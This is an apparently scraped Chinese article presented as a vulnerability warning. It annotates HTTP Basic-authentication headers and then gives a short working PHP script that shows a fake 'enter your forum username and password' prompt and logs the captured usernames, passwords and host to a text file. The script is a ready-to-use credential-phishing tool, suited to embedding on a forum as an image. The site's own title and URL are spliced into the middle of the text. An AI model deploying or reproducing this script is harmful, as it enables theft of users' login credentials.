文/饭
HTTP请求:
GET /iai.php HTTP/1.1 表示请求方法GET,请求的地址,和HTTP 协议版本
Accept: */* 表示客户端可识别的内容类型列表,*/*表示所有类型
Accept-Language: zh-cn 表示客户端所能解盘的语言:简体中文
Accept-Encoding: gzip, deflate 表示客户端可以解盘的类型
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET
CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022) 表示客户端浏览器型号
Host: www.test.cn 表示提交请求的页面
Connection: Keep-Alive 表示TCP连接保持打开
HTTP响应:
HTTP/1.1 401 Unauthorized 表示HTTP协议版本 401 即未经授权
访问
Date: Sat, 25 Jul 2009 11:42:27 GMT 表示当前的GMT时间
Server: Apache/2.2.3 (CentOS) 表示服务器的操作类型
X-Powered-By: PHP/5.1.6 表示服务器的脚本
WWW-Authenticate: Basic realm="Text" 表示客户端在 Authenticate 头中提供
的授权信息
Content-Length: 3 表示连接内容长度
Connection: close 表示TCP连接关闭
Content-Type: text/html 表示文档类型
负责响应的iai.php 文件内容:
header('WWW-Authenticate: Basic realm="Text"');
header('HTTP/1.0 401 Unauthorized');
使用了PHP中的Header()函数,发送一个原始 HTTP标头[Http Header]到客户
端,
图片验证漏洞的社工利用漏洞预警
,电脑资料
《图片验证漏洞的社工利用漏洞预警》(https://www.unjs.com)。
global $username,$passwd,$host;
if(!isset($_SERVER['PHP_AUTH_USER'])){
header('WWW-Authenticate:Basic realm="请输入论坛用户名密码"');
header('HTTP/1.0 401 Unauthorized');
exit;
}
$usname=$_SERVER['PHP_AUTH_USER'];
$passwd=$_SERVER['PHP_AUTH_PW'];
$host=$_SERVER['HTTP_HOST'];
$myFile="log.txt";
$fh=fopen($myFile,'a') or die("can't open file");
fwrite($fh,"网址:\t$host\t\t");
fwrite($fh,"usname:\t$usname\t");
fwrite($fh,"passwd:\t$passwd\r\n");
fclose($fh);
?>